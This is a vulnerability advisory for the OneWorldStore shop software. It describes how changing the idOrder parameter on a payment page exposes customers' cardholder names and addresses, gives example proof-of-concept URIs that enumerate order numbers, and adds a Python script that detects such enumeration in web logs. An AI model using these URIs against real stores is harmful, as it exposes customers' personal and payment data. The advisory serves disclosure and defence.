OneWorldStore IDOrder Information Disclosure Vulnerability
BID:13361
Info
| Bugtraq ID: | 13361 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 25 2005 12:00AM |
| Updated: | Apr 25 2005 12:00AM |
| Credit: | Lostmon <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: | OneWorldStore OneWorldStore |
| Not Vulnerable: | |
Discussion
OneWorldStore is prone to an information disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
Exploitation of this vulnerability would expose the customer names, as they appear on credit cards, and their addresses to the attacker.
Exploit / POC
No exploit is required.
The following proof of concept URIs are available:
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=2
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=3
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=
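A log check for the pattern the proof-of-concept URIs show: one client requesting many different idOrder values on owOfflineCC.asp. This is an added example, not part of the original advisory or the vendor's code; the Common Log Format input, the constructed sample lines and the `max_distinct` threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Path and parameter taken from the advisory's proof-of-concept URIs.
TARGET_PATH = "/owbasket/paymentmethods/owofflinecc.asp"
PARAM = "idorder"

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [25/Apr/2005:10:00:01 +0000] "GET /owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1 HTTP/1.1" 200 5120
198.51.100.7 - - [25/Apr/2005:10:00:02 +0000] "GET /owBasket/PaymentMethods/owOfflineCC.asp?idOrder=2 HTTP/1.1" 200 5098
198.51.100.7 - - [25/Apr/2005:10:00:03 +0000] "GET /owBasket/PaymentMethods/owOfflineCC.asp?idOrder=3 HTTP/1.1" 200 5133
198.51.100.7 - - [25/Apr/2005:10:00:04 +0000] "GET /owbasket/paymentmethods/owofflinecc.asp?IDORDER=4 HTTP/1.1" 200 5101
203.0.113.20 - - [25/Apr/2005:10:05:00 +0000] "GET /owBasket/PaymentMethods/owOfflineCC.asp?idOrder=57 HTTP/1.1" 200 5110
203.0.113.20 - - [25/Apr/2005:10:05:09 +0000] "GET /owBasket/PaymentMethods/owOfflineCC.asp?idOrder=57 HTTP/1.1" 200 5110
203.0.113.21 - - [25/Apr/2005:10:06:00 +0000] "GET /owBasket/default.asp HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')

def order_ids_by_client(log_text):
    """Map client address -> set of idOrder values it requested on the payment page."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        url = urlsplit(target)
        # IIS/ASP treats paths and query keys case-insensitively, so normalise both.
        if url.path.lower() != TARGET_PATH:
            continue
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            if key.lower() == PARAM:
                seen[client].update(values)
    return seen

def enumeration_suspects(log_text, max_distinct=2):
    """Clients that asked for more distinct order IDs than the assumed threshold."""
    return {c: sorted(ids) for c, ids in order_ids_by_client(log_text).items()
            if len(ids) > max_distinct}

if __name__ == "__main__":
    for client, ids in enumeration_suspects(SAMPLE_LOG).items():
        print(client, "requested order IDs", ids)
```

Tune `max_distinct` to how many orders a single shopper normally views in the log window being examined.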
Solution / Fix
Solution:
The vendor has addressed this issue in the latest update.
OneWorldStore OneWorldStore
- OneWorldStore OneWorldStore Current
http://oneworldstore.com/support_updates.asp
References
References:
- Lostmon's Blog Page (Lostmon ([email protected]))
- OneWorldStore Homepage (OneWorldStore)
- OneWorldStore Security Advisories (OneWorldStore)